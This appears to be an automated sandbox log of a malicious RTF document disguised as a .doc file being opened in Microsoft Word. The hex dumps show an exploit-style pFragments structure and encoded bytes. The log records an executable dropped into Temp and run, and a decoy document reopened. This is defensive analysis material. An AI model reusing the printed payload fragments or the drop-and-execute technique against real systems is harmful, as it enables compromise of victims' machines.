    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH..FLBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432656194
    Window created Window Name: _WwB Class Name: _WwB success 432670934
    Message sent HWND: 20132 Message: DDE_ACK WParam: 655694 LParam: 3221864475 success 432671446
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19521106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15C0000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 432675095
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19531106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15C0000 Size: 126976 Protection: read write Mapped to pid: own pid object name not found 432675630
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19531106360 Access: query and write and read Type: reserve Baseaddress: 15C0000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 432675765
    Section loaded Path: \BaseNamedObjects\MSCTF.Shared.SFM.AJH Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15E0000 Size: 524288 Protection: read write Mapped to pid: own pid success or wait 432681978
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.B.FLBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432682554
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.C.FLBMB Access: query and write and read Type: commit Baseaddress: 1660000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432682932
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.D.FLBMB Access: query and write and read Type: commit Baseaddress: 1670000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432683460
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.E.FLBMB Access: query and write and read Type: commit Baseaddress: 1680000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432683823
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.F.FLBMB Access: query and write and read Type: commit Baseaddress: 1690000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432684186
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.G.FLBMB Access: query and write and read Type: commit Baseaddress: 16A0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432684549
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.H.FLBMB Access: query and write and read Type: commit Baseaddress: 16B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432684911
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.I.FLBMB Access: query and write and read Type: commit Baseaddress: 16C0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432685184
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.J.EMBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432687238
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.K.EMBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432710825
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.L.EMBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432711764
    Section loaded Path: C:\DOCUME~1\ALLUSE~1\APPLIC~1\MICROS~1\OFFICE\DATA\OPA11.BAK Access: query and write and read and execute and extend size Type: commit Baseaddress: 1660000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 432725532
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.M.ENBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432778129
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.N.ENBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432790625
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.O.ENBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432797045
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.P.DOBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432801217
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.AB.DOBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432815821
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.G.DOBMB Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432820735
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.H.DOBMB Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432821121
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.I.DOBMB Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432821460
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.J.DOBMB Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432821796
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.K.DOBMB Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432822117
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.L.DOBMB Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432822438
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.M.DOBMB Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432822769
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.N.DOBMB Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432823094
    Section loaded Path: \BaseNamedObjects\DfSharedHeap30B4E Access: query and write and read Type: reserve Baseaddress: 1670000 Size: 4194304 Protection: read write Mapped to pid: own pid success or wait 433024042
    Section loaded Path: \BaseNamedObjects\DFMap0-199506 Access: query and write and read Type: commit Baseaddress: 1A70000 Size: 524288 Protection: read write Mapped to pid: own pid success or wait 433025954
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433031452
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433032252
    File read Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 4096 Value: 7B 5C 72 74 66 31 7B 5C 73 68 70 7B 5C 2A 5C 73 68 70 69 6E 73 74 7B 5C 73 70 7B 5C 73 6E 20 70 46 72 61 67 6D 65 6E 74 73 7D 7B 5C 73 76 20 31 3B 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 success or wait 433033063
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433035940
    File read Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 4096 Value: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 success or wait 433036037
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433038047
    File read Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 4096 Value: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 success or wait 433038141
    File write Path: C:\~$D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 54 Value: 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 433042477
    File write Path: C:\~$D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 108 Value: 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 1E 00 00 00 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 16 00 00 00 4E 01 0A 00 32 01 02 00 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 00 00 00 success or wait 433042921
    Window created Window Name: _WwF Class Name: _WwF success 433050262
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433071294
    File read Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 4096 Value: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 success or wait 433071384
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433073741
    File read Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 4096 Value: 30 65 39 65 39 30 30 30 30 30 30 35 38 33 65 38 62 31 38 33 65 38 39 31 63 30 65 34 31 34 30 33 65 38 30 33 63 30 65 30 30 37 35 66 30 33 65 38 39 37 37 35 30 36 61 30 30 36 61 30 30 36 61 30 32 36 61 30 30 36 61 30 30 36 38 30 30 30 30 30 30 34 30 33 65 66 66 37 37 35 30 33 65 66 66 35 37 31 34 33 success or wait 433073835
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433081570
    File read Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 4096 Value: EC 9B DE FD E3 DB FA F0 E6 FE F4 D8 EE E0 E9 E0 EE CB 89 88 29 84 D7 E1 E2 E6 D1 F2 10 1D 18 0F 08 37 1C 15 18 04 0C 74 BE 73 36 15 1B 3A 05 1E 0E 0B 0D 2B 08 08 11 01 1B 16 61 60 2A 5D 0B 35 29 2E 2C 39 3B 17 39 38 3C 31 51 50 2F 4E 0E 3E 2E 2B 3D 2D 17 34 2A 27 26 31 32 01 3F 3E 56 3D 7C 5F 4D 74 success or wait 433081670
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433083842
    File read Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 4096 Value: 5E AC 83 1C 06 CA DB 58 9E 9A A6 E0 05 C4 20 C6 11 80 26 80 7D 78 44 CB D4 B1 BE D5 67 7E 32 6C C7 D9 F7 8D 0D 33 04 FD A5 0B 93 6A C1 D6 6D D4 0A F3 C2 0B EF 0C F3 AD 43 8D A6 F9 42 C2 CD EB 21 C4 A0 81 B9 B8 D6 AC B2 77 DA F1 6D DD A8 93 BD 72 3D 74 85 C9 64 89 2A 94 90 9B 29 B0 A8 88 22 18 C1 10 success or wait 433083936
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433086162
    File read Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 4096 Value: C2 4C 1F E6 3D CA 26 0D CB EE 49 73 6E 1A 07 25 C7 FB 6D 50 86 9C 5D ED C6 8A 97 F0 AE 9B 65 0E 36 E0 96 B5 81 46 C8 D2 EE 3F 2D 46 C0 7B B0 AC B7 B7 F1 AD 6E 94 AB D3 DD 29 C2 92 4C 3D CB 7C 06 22 8A 15 ED 6F BF 42 C1 F6 D2 7A 83 14 45 16 C7 0B 74 96 FA 4F F9 97 BD 82 4C 1E CE 21 56 6D DE 21 4B 04 success or wait 433086269
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433088456
    File read Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 4096 Value: 86 DF 50 A2 98 19 EA A0 6F D7 DE 15 71 8B D8 44 AF 41 E6 1D 52 B4 94 BF 14 03 38 03 44 47 A4 FB 9D 52 99 95 45 C5 56 3B 60 13 EB 67 E4 76 6F 5D ED 07 10 7B 8F D0 E0 54 9C A4 14 5C 4F E3 83 79 A0 31 DA 90 A4 37 9C 92 D7 C3 F0 24 EC 2A 43 F9 39 43 B4 E7 85 AA 6B 7B 51 55 F8 31 CF E8 F9 0D 01 37 B4 5D success or wait 433088550
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433091451
    File read Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 4096 Value: 00 00 00 00 00 9C 0B 00 00 00 00 00 00 B8 03 00 00 00 00 00 00 B8 03 00 00 00 00 00 00 B8 03 00 00 00 00 00 00 A4 03 00 00 00 00 00 00 A4 03 00 00 00 00 00 00 A4 03 00 00 00 00 00 00 A4 03 00 00 00 00 00 00 A4 03 00 00 00 00 00 00 A4 03 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 02 00 0C 01 00 00 00 success or wait 433091545
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433093742
    File read Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 4096 Value: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 433093840
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433096641
    File read Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 4096 Value: 80 00 00 00 80 00 00 00 00 00 00 00 00 00 00 98 00 00 00 00 30 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 00 00 00 98 00 00 00 00 30 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 00 00 00 98 00 00 00 00 30 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 00 00 00 98 success or wait 433096734
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433099684
    File read Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 4096 Value: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 433099780
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433102616
    File read Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 4096 Value: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 433102711
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433105491
    File read Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 1187 Value: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 433105585
    Section loaded Path: \BaseNamedObjects\Local\MSO_Formal11106360_S-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1A70000 Size: 524288 Protection: read write Mapped to pid: own pid object name not found 433115423
    Section loaded Path: \BaseNamedObjects\Local\MSO_Formal11106360_S-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 1A70000 Size: 8192 Protection: read write Mapped to pid: own pid success or wait 433115567
    Section loaded Path: \BaseNamedObjects\Local\MSO_AdHoc11106360_S-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1A70000 Size: 8192 Protection: read write Mapped to pid: own pid object name not found 433117066
    Section loaded Path: \BaseNamedObjects\Local\MSO_AdHoc11106360_S-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 1A80000 Size: 8192 Protection: read write Mapped to pid: own pid success or wait 433117208
    Window created Window Name: _WwB Class Name: _WwB success 433119876
    Window created Window Name: _WwG Class Name: _WwG success 433125197
    Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR success 433126329
    Window created Window Name: _WwC Class Name: _WwC success 433127650
    Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR success 433219993
    Window created Window Name: _WwC Class Name: _WwC success 433303038
    Window created Window Name: _WwC Class Name: _WwC success 433303351
    Window created Window Name: _WwC Class Name: _WwC success 433309551
    Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL Access: write and read and execute Type: commit Baseaddress: 2E50000 Size: 1773568 Protection: execute Mapped to pid: own pid success or wait 433359956
    Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL Access: query and write and read and execute Type: image Baseaddress: 39800000 Size: 1777664 Protection: read write Mapped to pid: own pid success or wait 433361957
    Section loaded Path: \KnownDlls\WTSAPI32.DLL Access: write and read and execute Type: unknown Baseaddress: 39800000 Size: 1777664 Protection: read write Mapped to pid: own pid object name not found 433376750
    Section loaded Path: C:\WINDOWS\system32\wtsapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76F50000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 433377363
    Section loaded Path: \KnownDlls\WINSTA.dll Access: write and read and execute Type: unknown Baseaddress: 76F50000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 433380590
    Section loaded Path: C:\WINDOWS\system32\winsta.dll Access: query and write and read and execute Type: image Baseaddress: 76360000 Size: 65536 Protection: read write Mapped to pid: own pid success or wait 433381197
    Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 76360000 Size: 65536 Protection: read write Mapped to pid: own pid object name not found 433382122
    Section loaded Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 433383632
    Memory allocated PID: 1888 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Base: 21E000 Length: 123170 Allocation Type: null Protection: page read and write success or wait 433580660
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433589584
    File read Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 58531 Value: 7B 5C 72 74 66 31 7B 5C 73 68 70 7B 5C 2A 5C 73 68 70 69 6E 73 74 7B 5C 73 70 7B 5C 73 6E 20 70 46 72 61 67 6D 65 6E 74 73 7D 7B 5C 73 76 20 31 3B 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 success or wait 433608900
    File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 434639948
    File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S Offset: none Length: 17925 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 434671674
    Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S Access: query and write and read and execute and extend size Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 434676557
    Section loaded Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 2F80000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 434715648
    Section loaded Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 434726515
    Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 2F80000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 434733189
    Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S Access: query and read Type: commit Baseaddress: 2F80000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 434801697
    Process created PID: 1568 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S Cmdline: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\S Createflags: 0 success or wait 434832556
    File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.doc Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 471309054
    File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.doc Offset: none Length: 23552 Value: D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3E 00 03 00 FE FF 09 00 06 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 29 00 00 00 00 00 00 00 00 10 00 00 2B 00 00 00 01 00 00 00 FE FF FF FF 00 00 00 00 28 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF success or wait 471320989
    Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Access: query and write and read and execute and extend size Type: image Baseaddress: 2F80000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 471323128
    Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Access: query and read Type: commit Baseaddress: 2F90000 Size: 12050432 Protection: readonly Mapped to pid: own pid success or wait 471324606
    Process created PID: 296 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Cmdline: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.doc Createflags: 0 success or wait 471325507
    Process terminated PID: 1888 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 495109298
    Analysis File: svchost.exe PID: 1384 Parent PID: 688
    + Sections
    + General
    Start time: 04:13:05
    Start date: 13/12/2011
    Path: C:\WINDOWS\system32\svchost.exe
    Commandline: not known
    Imagebase: 0x1000000
    File size: 14336 bytes
    MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18
    Section Activities:
    + Section loaded by Windows
    File Path Access Type Base Size Mapped to pid Protection Completion Count
    \KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
    unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
    \NLS\NlsSectionUnicode read unknown 1B0000 90112 own pid readonly success or wait 1
    \NLS\NlsSectionLocale read unknown 1D0000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey query and read unknown 220000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortTbls read unknown 270000 24576 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
    \NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
    \KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
    \KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
    \KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
    \KnownDlls\ShimEng.dll write and read and execute unknown 77FE0000 69632 own pid read write object name not found 1
    C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
    C:\WINDOWS\AppPatch\sysmain.sdb read commit 280000 1208320 own pid readonly success or wait 1
    C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
    C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
    C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
    \KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
    \KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
    \KnownDlls\WINMM.dll write and read and execute unknown 77F10000 299008 own pid read write object name not found 1
    C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
    \KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
    \KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
    \KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
    \KnownDlls\MSACM32.dll write and read and execute unknown 77120000 569344 own pid read write object name not found 1
    C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
    \KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
    \KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
    \KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
    \KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
    \KnownDlls\UxTheme.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
    C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
    \NLS\NlsSectionCType read unknown 3D0000 12288 own pid readonly success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
    C:\WINDOWS\system32\shell32.dll read commit 630000 8462336 own pid readonly success or wait 1
    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 630000 1056768 own pid execute success or wait 1
